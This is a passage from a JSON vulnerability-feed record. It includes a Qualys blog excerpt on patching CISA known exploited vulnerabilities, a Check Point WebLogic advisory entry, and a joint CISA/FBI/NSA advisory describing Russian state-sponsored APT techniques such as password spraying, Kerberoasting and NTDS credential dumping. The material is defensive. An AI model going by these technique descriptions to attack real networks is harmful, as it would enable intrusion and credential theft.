cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:44", "description": "A remote code execution vulnerability exists in Oracle WebLogic. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-01T00:00:00", "type": "checkpoint_advisories", "title": "Oracle WebLogic Remote Code Execution (CVE-2020-14882; CVE-2020-14750; CVE-2020-14825; CVE-2020-14883)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14825", "CVE-2020-14882", "CVE-2020-14883"], "modified": "2021-01-21T00:00:00", "id": "CPAI-2020-1138", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-23T06:56:14", "description": "### Summary\n\n_**Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.** \n\u2022 Patch all systems. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)._ \n\u2022 Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>). \n\u2022 _Use antivirus software._ \n_\u2022 Develop internal contact lists and surge support._\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint Cybersecurity Advisory (CSA)\u2014authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA)\u2014is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian state-sponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. This overview is intended to help the cybersecurity community reduce the risk presented by these threats.\n\nCISA, the FBI, and NSA encourage the cybersecurity community\u2014especially critical infrastructure network defenders\u2014to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations listed below and detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation.\n\n 1. **Be prepared**. Confirm reporting processes and minimize personnel gaps in IT/OT security coverage. Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems are disrupted or need to be taken offline.\n 2. **Enhance your organization\u2019s cyber posture**. Follow best practices for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n 3. **Increase organizational vigilance**. Stay current on reporting on this threat. [Subscribe](<https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED>) to CISA\u2019s [mailing list and feeds](<https://www.cisa.gov/uscert/mailing-lists-and-feeds>) to receive notifications when CISA releases information about a security topic or threat.\n\nCISA, the FBI, and NSA encourage critical infrastructure organization leaders to review CISA Insights: [Preparing for and Mitigating Cyber Threats](<https://cisa.gov/sites/default/files/publications/CISA_INSIGHTS-Preparing_For_and_Mitigating_Potential_Cyber_Threats-508C.pdf>) for information on reducing cyber threats to their organization.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nHistorically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics\u2014including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security\u2014to gain initial access to target networks. Vulnerabilities known to be exploited by Russian state-sponsored APT actors for initial access include:\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) FortiGate VPNs\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) Cisco router\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) Oracle WebLogic Server\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) Kibana\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) Zimbra software\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) Exim Simple Mail Transfer Protocol\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) Pulse Secure\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) Citrix\n * [CVE-2020-0688 ](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)Microsoft Exchange\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) VMWare (note: this was a zero-day at time.)\n * [CVE-2020-5902 ](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)F5 Big-IP\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) Oracle WebLogic\n * [CVE-2021-26855 ](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)Microsoft Exchange (Note: this vulnerability is frequently observed used in conjunction with [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\nRussian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware. The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments\u2014including cloud environments\u2014by using legitimate credentials.\n\nIn some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware. See the following advisories and alerts for information on historical Russian state-sponsored cyber-intrusion campaigns and customized malware that have targeted ICS:\n\n * ICS Advisory [ICS Focused Malware \u2013 Havex](<https://us-cert.cisa.gov/ics/advisories/ICSA-14-178-01>)\n * ICS Alert [Ongoing Sophisticated Malware Campaign Compromising ICS (Update E)](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-14-281-01B>)\n * ICS Alert [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/IR-ALERT-H-16-056-01>)\n * Technical Alert [CrashOverride Malware](<https://us-cert.cisa.gov/ncas/alerts/TA17-163A>)\n * CISA MAR [HatMan: Safety System Targeted Malware (Update B)](<https://us-cert.cisa.gov/ics/MAR-17-352-01-HatMan-Safety-System-Targeted-Malware-Update-B>)\n * CISA ICS Advisory [Schneider Electric Triconex Tricon (Update B)](<https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-02>)\n\nRussian state-sponsored APT actors have used sophisticated cyber capabilities to target a variety of U.S. and international critical infrastructure organizations, including those in the Defense Industrial Base as well as the Healthcare and Public Health, Energy, Telecommunications, and Government Facilities Sectors. High-profile cyber activity publicly attributed to Russian state-sponsored APT actors by U.S. government reporting and legal actions includes:\n\n * **Russian state-sponsored APT actors targeting state, local, tribal, and territorial (SLTT) governments and aviation networks, September 2020, through at least December 2020.** Russian state-sponsored APT actors targeted dozens of SLTT government and aviation networks. The actors successfully compromised networks and exfiltrated data from multiple victims.\n * **Russian state-sponsored APT actors\u2019 global Energy Sector intrusion campaign, 2011 to 2018. **These Russian state-sponsored APT actors conducted a multi-stage intrusion campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data.\n * **Russian state-sponsored APT actors\u2019 campaign against Ukrainian critical infrastructure, 2015 and 2016.** Russian state-sponsored APT actors conducted a cyberattack against Ukrainian energy distribution companies, leading to multiple companies experiencing unplanned power outages in December 2015. The actors deployed [BlackEnergy](<https://attack.mitre.org/versions/v10/software/S0089>) malware to steal user credentials and used its destructive malware component, KillDisk, to make infected computers inoperable. In 2016, these actors conducted a cyber-intrusion campaign against a Ukrainian electrical transmission company and deployed [CrashOverride ](<https://attack.mitre.org/versions/v10/software/S0604>)malware specifically designed to attack power grids.\n\nFor more information on recent and historical Russian state-sponsored malicious cyber activity, see the referenced products below or [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>).\n\n * Joint FBI-DHS-CISA CSA [Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders](<https://us-cert.cisa.gov/ncas/alerts/aa21-116a>)\n * Joint NSA-FBI-CISA CSA [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)\n * Joint FBI-CISA CSA [Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://www.cisa.gov/uscert/ncas/alerts/aa20-296a>)\n * Joint CISA-FBI CSA [APT Actors Chaining Vulnerabilities against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n * CISA\u2019s webpage [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA Alert [Russian Government Cyber Activity Targeting Energy Sector and Other Critical Infrastructure Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA18-074A>)\n * CISA ICS Alert: [Cyber-Attack Against Ukrainian Critical Infrastructure](<https://us-cert.cisa.gov/ics/alerts/ir-alert-h-16-056-01>)\n\nTable 1 provides common, publicly known TTPs employed by Russian state-sponsored APT actors, which map to the MITRE ATT&CK for Enterprise framework, version 10. **Note:** these lists are not intended to be all inclusive. Russian state-sponsored actors have modified their TTPs before based on public reporting.[[1](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)] Therefore, CISA, the FBI, and NSA anticipate the Russian state-sponsored actors may modify their TTPs as they deem necessary to reduce their risk of detection. \n\n_Table 1: Common Tactics and Techniques Employed by Russian State-Sponsored APT Actors_\n\nTactic | **Technique** | **Procedure** \n---|---|--- \n \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]\n\n| \n\nActive Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)] \n \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \n \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]\n\n| \n\nRussian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \n \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)\n\n| \n\nDevelop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]\n\n| \n\nRussian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\n| \n\nExploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]\n\n| \n\nRussian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \n \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]\n\n| \n\nRussian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]\n\n| \n\nCommand and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]\n\n| \n\nRussian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]\n\n| \n\nValid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]\n\n| \n\nRussian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]\n\n| \n\nBrute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]\n\n| \n\nRussian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \n \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]\n\n| \n\nRussian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \n \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]\n\n| \n\nRussian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \n \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]\n\n| \n\nRussian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \n \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]\n\n| \n\nRussian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \n \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]\n\n| \n\nRussian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \n \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]\n\n| \n\nProxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]\n\n| \n\nRussian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic. \n \nFor additional enterprise TTPs used by Russian state-sponsored APT actors, see the ATT&CK for Enterprise pages on [APT29](<https://attack.mitre.org/versions/v10/groups/G0016>), [APT28](<https://attack.mitre.org/versions/v10/groups/G0007>), and the [Sandworm Team](<https://attack.mitre.org/versions/v10/groups/G0034>), respectively. For information on ICS TTPs see the [ATT&CK for ICS](<https://collaborate.mitre.org/attackics/index.php/Main_Page>) pages on the [Sandworm Team](<https://collaborate.mitre.org/attackics/index.php/Group/G0007>), [BlackEnergy 3 ](<https://collaborate.mitre.org/attackics/index.php/software/S0004>)malware, [CrashOveride](<https://collaborate.mitre.org/attackics/index.php/software/S0001>) malware, BlackEnergy\u2019s [KillDisk](<https://collaborate.mitre.org/attackics/index.php/software/S0016>) component, and [NotPetya](<https://collaborate.mitre.org/attackics/index.php/software/S0006>) malware.\n\n### Detection\n\nGiven Russian state-sponsored APT actors demonstrated capability to maintain persistent, long-term access in compromised enterprise and cloud environments, CISA, the FBI, and NSA encourage all critical infrastructure organizations to:\n\n * **Implement robust log collection and retention.** Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, examples include: \n * Native tools such as M365\u2019s Sentinel. \n * Third-party tools, such as Sparrow, Hawk, or CrowdStrike's Azure Reporting Tool (CRT), to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. **Note:** for guidance on using these and other detection tools, refer to CISA Alert [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>).\n * **Look for behavioral evidence or network and host-based artifacts **from known Russian state-sponsored TTPs. See table 1 for commonly observed TTPs. \n * To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for multiple, failed authentication attempts across multiple accounts.\n * To detect use of compromised credentials in combination with a VPS, follow the below steps: \n * Look for suspicious \u201cimpossible logins,\u201d such as logins with changing username, user agent 